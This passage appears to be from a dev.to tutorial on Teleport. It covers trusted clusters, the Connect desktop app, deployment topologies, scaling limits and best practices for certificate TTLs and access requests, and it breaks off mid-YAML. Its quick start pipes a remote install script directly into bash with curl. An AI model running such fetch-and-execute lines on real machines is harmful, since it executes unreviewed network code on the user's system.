&lt;p&gt;&lt;strong&gt;Architecture:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd3jdc8y6pq3iwi6mqq20.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd3jdc8y6pq3iwi6mqq20.png" alt="image" width="800" height="661"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use Cases:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Region&lt;/strong&gt;: Separate clusters per region with central access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Business Units&lt;/strong&gt;: Independent teams with shared identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customer Environments&lt;/strong&gt;: MSPs managing multiple customer clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Acquisitions&lt;/strong&gt;: Integrate acquired companies while maintaining isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Trust Configuration:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# On leaf cluster - establish trust with root&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;trusted_cluster&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;root-cluster&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;role_map&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;remote&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;developer"&lt;/span&gt;
    &lt;span class="na"&gt;local&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;leaf-developer"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="na"&gt;proxy_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;root.teleport.example.com:443&lt;/span&gt;
  &lt;span class="na"&gt;token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;trusted-cluster-join-token"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Security Considerations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Trust is explicit and bidirectional&lt;/li&gt;
&lt;li&gt;Role mapping controls what root users can do in leaf&lt;/li&gt;
&lt;li&gt;Leaf cluster RBAC still enforced independently&lt;/li&gt;
&lt;li&gt;Audit logs maintained in each cluster&lt;/li&gt;
&lt;li&gt;Trust can be revoked at any time&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Teleport Connect: Desktop Experience
&lt;/h3&gt;

&lt;p&gt;Teleport Connect is a desktop application that provides a graphical interface for infrastructure access, making Teleport more accessible to users who prefer GUIs over command-line tools.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Visual Resource Browser&lt;/strong&gt;: Point-and-click access to servers, databases, and Kubernetes clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Saved Connections&lt;/strong&gt;: Frequently accessed resources bookmarked for quick access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrated Terminal&lt;/strong&gt;: Built-in terminal for SSH sessions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database Clients&lt;/strong&gt;: GUI for database queries and management&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cross-Platform&lt;/strong&gt;: Available for macOS, Windows, and Linux&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lower Barrier to Entry&lt;/strong&gt;: Easier for users new to Teleport&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Productivity&lt;/strong&gt;: Quick access to common resources&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Consistency&lt;/strong&gt;: Same security model as tsh CLI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration&lt;/strong&gt;: Works alongside existing Teleport deployment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Teleport Connect makes infrastructure access more intuitive while maintaining all the security benefits of certificate-based authentication and comprehensive auditing.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How It All Works Together: Complete Flow Examples
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Example 1: SSH Access to Production Server
&lt;/h3&gt;

&lt;p&gt;Let's walk through a complete access flow from login to executing commands:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgl4wvwsmy4wc16ac6d2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgl4wvwsmy4wc16ac6d2.png" alt="image" width="800" height="777"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Happens:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;User authenticates through their SSO provider&lt;/li&gt;
&lt;li&gt;Auth Service issues short-lived certificate with user's roles&lt;/li&gt;
&lt;li&gt;User selects server from web UI&lt;/li&gt;
&lt;li&gt;Proxy routes connection through reverse tunnel to SSH Agent&lt;/li&gt;
&lt;li&gt;SSH Agent validates certificate and checks RBAC&lt;/li&gt;
&lt;li&gt;Commands execute, session recorded, audit events logged&lt;/li&gt;
&lt;li&gt;After 8 hours, certificate expires automatically&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Example 2: Database Access Request Workflow
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7j81zey3y0g4zuy1dkzx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7j81zey3y0g4zuy1dkzx.png" alt="image" width="800" height="697"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Example 3: Kubernetes Cluster Access
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfi13fu0onk48fsvnozv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfi13fu0onk48fsvnozv.png" alt="image" width="800" height="655"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting Started with Teleport
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Quick Start: Local Testing
&lt;/h3&gt;

&lt;p&gt;Get Teleport running locally in minutes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Download and install Teleport&lt;/span&gt;
curl https://goteleport.com/static/install.sh | bash

&lt;span class="c"&gt;# Generate config&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;teleport configure &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /etc/teleport.yaml

&lt;span class="c"&gt;# Start Teleport (Auth + Proxy + Node)&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;teleport start

&lt;span class="c"&gt;# In another terminal, create a user&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;tctl &lt;span class="nb"&gt;users &lt;/span&gt;add myuser &lt;span class="nt"&gt;--roles&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;editor,access

&lt;span class="c"&gt;# Login with the user&lt;/span&gt;
tsh login &lt;span class="nt"&gt;--proxy&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;localhost:3080 &lt;span class="nt"&gt;--user&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;myuser

&lt;span class="c"&gt;# Connect to the local node&lt;/span&gt;
tsh ssh root@localhost
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Common Deployment Topologies
&lt;/h3&gt;

&lt;p&gt;Teleport can be deployed in multiple architectures depending on scale, availability needs, and geographic distribution.&lt;/p&gt;

&lt;p&gt;Below are the most common deployment patterns.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  1. Single-Node Deployment (Development / Small Teams)
&lt;/h4&gt;

&lt;p&gt;The simplest deployment runs Auth, Proxy, and Node services together on one machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcy3qcboejii636ycwl4u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcy3qcboejii636ycwl4u.png" alt="image" width="800" height="549"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Local testing&lt;/li&gt;
&lt;li&gt;Small internal environments&lt;/li&gt;
&lt;li&gt;Proof-of-concepts&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Tradeoff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Not highly available&lt;/li&gt;
&lt;li&gt;Control plane is a single point of failure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  2. High Availability Deployment (Production)
&lt;/h4&gt;

&lt;p&gt;In production, Teleport is typically deployed with multiple Proxies and Auth nodes backed by a shared database.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9a7dpm8cq0hafudosjv3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9a7dpm8cq0hafudosjv3.png" alt="image" width="800" height="1314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enterprise production deployments&lt;/li&gt;
&lt;li&gt;Thousands of users/sessions&lt;/li&gt;
&lt;li&gt;Resilience against failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key Properties:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Proxies scale horizontally&lt;/li&gt;
&lt;li&gt;Auth services share backend state&lt;/li&gt;
&lt;li&gt;Agents connect outbound via reverse tunnels&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  3. Multi-Region / Global Deployment (Trusted Clusters)
&lt;/h4&gt;

&lt;p&gt;Large organizations often run separate clusters per region, connected through Trusted Clusters.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiba5h6sc35bfrzougcqq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiba5h6sc35bfrzougcqq.png" alt="image" width="800" height="671"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Multi-region infrastructure&lt;/li&gt;
&lt;li&gt;Mergers/acquisitions&lt;/li&gt;
&lt;li&gt;Customer-isolated environments (MSPs)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Centralized identity with regional isolation&lt;/li&gt;
&lt;li&gt;Independent RBAC boundaries per cluster&lt;/li&gt;
&lt;li&gt;Reduced latency by keeping access local&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Choosing the Right Topology
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Situation&lt;/th&gt;
&lt;th&gt;Recommended Topology&lt;/th&gt;
&lt;th&gt;Reason&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Dev/test, single team&lt;/td&gt;
&lt;td&gt;Single-node&lt;/td&gt;
&lt;td&gt;No ops overhead; failure has low blast radius&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production, single region&lt;/td&gt;
&lt;td&gt;HA (multi-Proxy, multi-Auth, shared backend)&lt;/td&gt;
&lt;td&gt;Auth or Proxy failure must not gate all access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-region, latency-sensitive&lt;/td&gt;
&lt;td&gt;HA + Trusted Clusters&lt;/td&gt;
&lt;td&gt;Keep session traffic local; centralize identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MSP or multi-tenant&lt;/td&gt;
&lt;td&gt;Trusted Clusters per tenant&lt;/td&gt;
&lt;td&gt;Hard isolation boundary; independent RBAC per cluster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Acquisition integration&lt;/td&gt;
&lt;td&gt;Trusted Clusters&lt;/td&gt;
&lt;td&gt;Federate identity without merging infrastructure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;The core rule:&lt;/strong&gt; a single-node Teleport is acceptable only where downtime is acceptable. For any environment where access outages have consequences — on-call response, incident handling, production deployments — HA is not optional.&lt;/p&gt;

&lt;p&gt;Teleport’s architecture is flexible enough to evolve as your infrastructure grows. Start with single-node, promote to HA, extend to federation — each step is a configuration change, not a rebuild.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Production Deployment Checklist
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Design Your Architecture&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Determine if using Teleport Cloud or self-hosted&lt;/li&gt;
&lt;li&gt;Plan for high availability&lt;/li&gt;
&lt;li&gt;Choose backend storage (DynamoDB + S3, PostgreSQL, etcd, or Firestore)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deploy Control Plane&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Deploy Auth Service with HA backend&lt;/li&gt;
&lt;li&gt;Deploy Proxy Service behind load balancer&lt;/li&gt;
&lt;li&gt;Configure TLS certificates&lt;/li&gt;
&lt;li&gt;Set up DNS records&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrate Identity Provider&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Configure SSO (Okta, GitHub, Google, SAML)&lt;/li&gt;
&lt;li&gt;Define role mapping from SSO to Teleport roles&lt;/li&gt;
&lt;li&gt;Enable MFA requirements&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deploy Agents&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Install agents on servers, databases, Kubernetes clusters&lt;/li&gt;
&lt;li&gt;Configure appropriate services per agent&lt;/li&gt;
&lt;li&gt;Set up resource labels for RBAC&lt;/li&gt;
&lt;li&gt;Enable auto-discovery where applicable&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Configure RBAC&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Define roles based on job functions&lt;/li&gt;
&lt;li&gt;Use label-based access control&lt;/li&gt;
&lt;li&gt;Set appropriate certificate TTLs (hours, configurable)&lt;/li&gt;
&lt;li&gt;Configure access request workflows&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enable Audit and Compliance&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Configure session recording&lt;/li&gt;
&lt;li&gt;Set up audit log forwarding&lt;/li&gt;
&lt;li&gt;Configure retention policies&lt;/li&gt;
&lt;li&gt;Integrate with SIEM if needed&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Train Users&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Provide documentation for &lt;code&gt;tsh&lt;/code&gt; commands&lt;/li&gt;
&lt;li&gt;Explain certificate-based authentication&lt;/li&gt;
&lt;li&gt;Document access request process&lt;/li&gt;
&lt;li&gt;Share best practices&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Performance and Scaling Considerations
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Connection Flow Overhead
&lt;/h3&gt;

&lt;p&gt;Teleport adds minimal latency to connections:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Initial Authentication&lt;/strong&gt;: One-time certificate issuance (1-2 seconds)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Connection Establishment&lt;/strong&gt;: Certificate validation (milliseconds)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data Transfer&lt;/strong&gt;: After connection establishment, Teleport introduces &lt;strong&gt;minimal but non-zero overhead&lt;/strong&gt; — primarily from TLS termination at the Proxy, connection multiplexing through the reverse tunnel, and optional session recording. In practice this is imperceptible for interactive sessions, but measurable for high-throughput database or bulk-transfer workloads.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The certificate model means Teleport doesn't need to be consulted for every packet, only for initial connection establishment.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Scaling Characteristics
&lt;/h3&gt;

&lt;p&gt;Large-scale Teleport deployments can support:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Concurrent Sessions&lt;/strong&gt;: Thousands of concurrent sessions — practical limits are driven by Proxy CPU/memory, backend IOPS, and whether session recording is enabled. Proxy-mode recording is significantly heavier than node-mode recording at scale.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agents&lt;/strong&gt;: Each agent establishes persistent reverse tunnel connections (typically one or a small pool, scaling dynamically under load). Tens of thousands of registered nodes are achievable with a well-sized backend.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Users&lt;/strong&gt;: Large user bases supported (limits depend on backend performance and Auth Service sizing)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Resources&lt;/strong&gt;: Tens of thousands of resources in inventory&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Reality Check on Scale:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Teleport scales well, but &lt;strong&gt;scaling is not automatic — it is constrained by clear bottlenecks&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Backend IOPS and storage performance&lt;/li&gt;
&lt;li&gt;Proxy CPU and memory resources&lt;/li&gt;
&lt;li&gt;Audit event throughput and processing&lt;/li&gt;
&lt;li&gt;Network bandwidth for session traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  High-Performance Deployments
&lt;/h3&gt;

&lt;p&gt;For large-scale deployments:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Deploy multiple Proxy Service instances&lt;/li&gt;
&lt;li&gt;Use multiple Auth Service instances with shared backend&lt;/li&gt;
&lt;li&gt;Distribute agents across regions&lt;/li&gt;
&lt;li&gt;Use high-performance backend (DynamoDB with provisioned capacity, tuned PostgreSQL)&lt;/li&gt;
&lt;li&gt;Enable local caching on agents&lt;/li&gt;
&lt;li&gt;Scale DB Agents horizontally for high connection volumes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Real-world bottleneck pattern — Database Access:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;At scale, database access tends to become the first performance bottleneck teams hit. DB agents must multiplex many client connections, each of which requires TLS termination and proxying. Unlike SSH sessions (which are long-lived and low-overhead once established), database workloads often involve frequent short-lived connections that amplify this cost. Connection pooling behavior at the agent level matters significantly — teams typically need to scale DB agents horizontally earlier than they expect, and often before any other component shows strain.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Best Practices
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Certificate TTL Configuration
&lt;/h3&gt;

&lt;p&gt;Keep TTLs as short as practical. Short TTLs are the primary lever for limiting blast radius on compromised credentials — an attacker with a stolen certificate can only use it until it expires.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Short TTLs for production access&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;max_session_ttl&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;4h&lt;/span&gt;  &lt;span class="c1"&gt;# 4h is a good default; adjust down if re-auth friction is acceptable&lt;/span&gt;

&lt;span class="c1"&gt;# Longer TTLs for development&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;dev-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;max_session_ttl&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Production ≤ 8h (4h recommended). Bots/automation ≤ 1h. Dev ≤ 24h. Never set TTL longer than your incident response SLA.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Use Access Requests for Elevated Privileges
&lt;/h3&gt;

&lt;p&gt;Never grant permanent production access to human users. Use time-bounded requests instead — the approval friction is a feature, not a bug. Require a reason; it creates accountability and a paper trail that's useful in audits and post-incident reviews.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;developer&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;roles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production-access'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;thresholds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;approve&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
          &lt;span class="na"&gt;deny&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
      &lt;span class="c1"&gt;# Require a reason — surfaces intent and aids audit trails&lt;/span&gt;
      &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
